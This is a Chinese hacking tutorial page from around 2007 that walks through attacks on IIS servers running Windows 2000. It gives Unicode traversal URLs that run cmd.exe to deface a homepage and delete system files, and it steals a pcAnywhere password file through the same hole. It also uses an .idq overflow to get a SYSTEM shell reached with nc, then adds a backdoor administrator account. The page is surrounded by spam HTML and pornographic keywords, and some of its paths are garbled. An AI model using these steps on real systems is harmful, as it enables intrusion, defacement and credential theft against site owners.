• <ruby id="5koa6"></ruby>
    <ruby id="5koa6"><option id="5koa6"><thead id="5koa6"></thead></option></ruby>

    <progress id="5koa6"></progress>

  • <strong id="5koa6"></strong>
  • 流行的漏洞入侵(一)

    發表于:2007-07-02來源:作者:點擊數: 標簽:
    1 UNICODE漏洞 這是老漏洞了,但對于新手來說很好用,而且事實證明現在仍有很多的機子有這種漏洞,OK我們開始 先用掃描器掃到有UNICODE漏洞的機子,(注意漏洞的編碼方式有所不同有的是..%CI%IC.. 用的是..%C0%AF..當然還有其它的方式, 具體根據你的掃描器掃出的結
    1 UNICODE漏洞
    這是老漏洞了,但對于新手來說很好用,而且事實證明現在仍有很多的機子有這種漏洞,OK我們開始
    先用掃描器掃到有UNICODE漏洞的機子,(注意漏洞的編碼方式有所不同有的是..%CI%IC.. 用的是..%C0%AF..當然還有其它的方式, 具體根據你的掃描器掃出的結果為標準
    我們在流覽器(IE)的地址欄中輸入
    ..%c1%1c../winnt/system32/cmd.exe?/c+dir
    這時你可以看到它的系統目錄但我們要的是主頁面放置的目錄
    在輸入
    ..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:inetpubwwwroot
    看到了吧,目錄中的INDEX.HTML INDEX.ASP DEFAULT.ASP DEFAULT.ASP等等就是它的主頁面,
    我們來換它的頁面
    ..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:winntsystem32cmd.exe+clearcase/" target="_blank" >ccc.exe

    >+c:inetpubwwwrootestdirector/" target="_blank" >tdefault.asp
    OK
    成功了,此時它的主頁面被換成了HACKED BY KAWEN
    大家可以看看
    ..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:winntsystem32cmd.exe+ccc.exe 執行后是復制,如果換成這個呢
    ..%c1%1c../winnt/system32/cmd.exe?/c+DEL+c:winntsystem32cmd.exe
    沒錯就是刪除了
    知道怎么做了吧
    呵呵

    2利用PCANWHERE攻擊網站
    現在開始入正題了,剛才只是熱身
    由于NT的機器一般使用PCAnyWhere進行遠程管理,因此如果能夠得到PCAnyWhere遠程連接的帳號和密碼,那么就能遠程連接到主機。 ( )便可以取得帳號和密碼
    Telnet IP 5631
    我們可以看看PCANYWHERE開了沒
    使用Unicode漏洞+ PCanyWhere密碼查看工具
    首先我們要DOWN一個可以破 Pcanywhere的工具

    OK 我們現在要找到主機上的*.CIF文件
    在IE中輸入 ..%c1%1c../winnt/system32/cmd.exe?/c+dir c:*.cif /s
    一般Citempl.cif為系統默認的密碼文件,因此我們需要SA.CIF文件。 復制該文件到網站目錄下。
    需要知道網站目錄,可以通過ida,idq漏洞進行得到,也可以去尋找網站中的一個圖片文件,比如Tscontent.gif文件,然后去查找該文件:使用命令 dir c: Tscontent.gif /s
    比如網站目錄為c:inetpubwwwroot 一般都有是啦 呵呵
    密碼文件所在目錄:c:Program FilespcANYWHEREDATA
    下面執行Copy命令:
    ..%c1%1c../winnt/system32/cmd.exe?/c+copy c:Program FilespcANYWHEREDATASA.CGI c:inetpubwwwroot
    顯示1 file(s) copied,就表示復制成功了。

    使用IE下載該文件
    使用 就可以下載該文件了。

    使用PCanyWhere密碼查看工具得到用戶名和密碼

    3利用.idq漏洞  

    為了方便大家可以看懂下面說的是什么可以先到這里來看看

    一共有兩個版本.一個是GUI版本.一個是命令行版本.
    這里我們來說CUI版本,反正都差不多了,關鍵是要多試
    首先我們要找到有.IDQ漏洞的機子,可以用流光掃一下
    運行軟件
    在被攻擊IP地址后面寫上對方的IP.端口號一般不需要改動.
    左面選擇操作系統類型.先選擇IIS5 English Win2k Sp0吧~
    軟件的默認綁定CMD.EXE的端口是813.不改了.用默認吧~~~
    點擊IDQ溢出~~OK~~出現發送Shellcode成功的提示了.
    接著我們用NC,你可以到到盟下載
    C:>nc -vv XXX.XXX.XXX.XXX 813
    XXX.XXX.XXX.XXX: inverse host lookup failed: h_errno 11004: NO_DATA
    (UNKNOWN) [XXX.XXX.XXX.XXX] 813 (?) open
    Microsoft Windows 2000 [Version 5.00.2195]
    (C) Copyright 1985-2000 Microsoft Corp.

    C:WINNTsystem32>

    OK!!!上來了
    你現在有SYSTEM權限,不錯吧,該做什么不用我教了吧,比如為自已留下個后門
    net user hacker password /add @#添加一給名為hacker,密碼為passwod的用戶!
    net localgroup administrators hacker /add @# 把剛才創建的用戶加入 Admnistrators組
    OK我們在來看看DOS版本
    下載軟件后會有個運行文件,它太長了,將它必名為KAWEN
    D:>KAWEN
    運行參數: 操作系統類型 目的地址 web端口 溢出端口
    支持的操作系統 類型: ----
    0 -- IIS5中文Win2k Sp0
    1 -- IIS5中文Win2k Sp1
    2 -- IIS5中文Win2k Sp2
    3 -- IIS5 English Win2k Sp0
    4 -- IIS5 English Win2k Sp1
    5 -- --not support -- IIS5 English Win2k Sp2
    6 -- IIS5 Japanese Win2k Sp0
    7 -- IIS5 Japanese Win2k Sp1
    8 -- --not support -- IIS5 Japanese Win2k Sp2

    D:>KAWEN 3 XXX.XXX.XXX.XXX80 456
    連接目的機器 XXX.XXX.XXX.XXX:80 OK.
    發送shellcode 到 XXX.XXX.XXX.XXX:80 OK
    現在,你可以 連接 該主機的 端口 456了,good luck.!

    開始吧
    D:>nc -vv XXX.XXX.XXX.XXX 456
    mail.rycf.org [XXX.XXX.XXX.XXX] 456 (?): connection refused
    sent 0, rcvd 0: NOTSOCK

    沒成功.試試sp1.
    D:>KAWEN 4 XXX.XXX.XXX.XXX 80 888
    連接目的機器 XXX.XXX.XXX.XXX:80 OK.
    發送shellcode 到 XXX.XXX.XXX.XXX:80 OK
    現在,你可以 連接 該主機的 端口 888了,good luck.!
    D:>nc -vv XXX.XXX.XXX.XXX 888
    XXX.XXX.XXX.XXX: inverse host lookup failed: h_errno 11004: NO_DATA
    (UNKNOWN) [XXX.XXX.XXX.XXX] 888 (?) open
    Microsoft Windows 2000 [Version 5.00.2195]
    (C) Copyright 1985-2000 Microsoft Corp.

    C:WINNTsystem32>
    看看我們又成功了

    原文轉自:http://www.kjueaiud.com

    老湿亚洲永久精品ww47香蕉图片_日韩欧美中文字幕北美法律_国产AV永久无码天堂影院_久久婷婷综合色丁香五月

  • <ruby id="5koa6"></ruby>
    <ruby id="5koa6"><option id="5koa6"><thead id="5koa6"></thead></option></ruby>

    <progress id="5koa6"></progress>

  • <strong id="5koa6"></strong>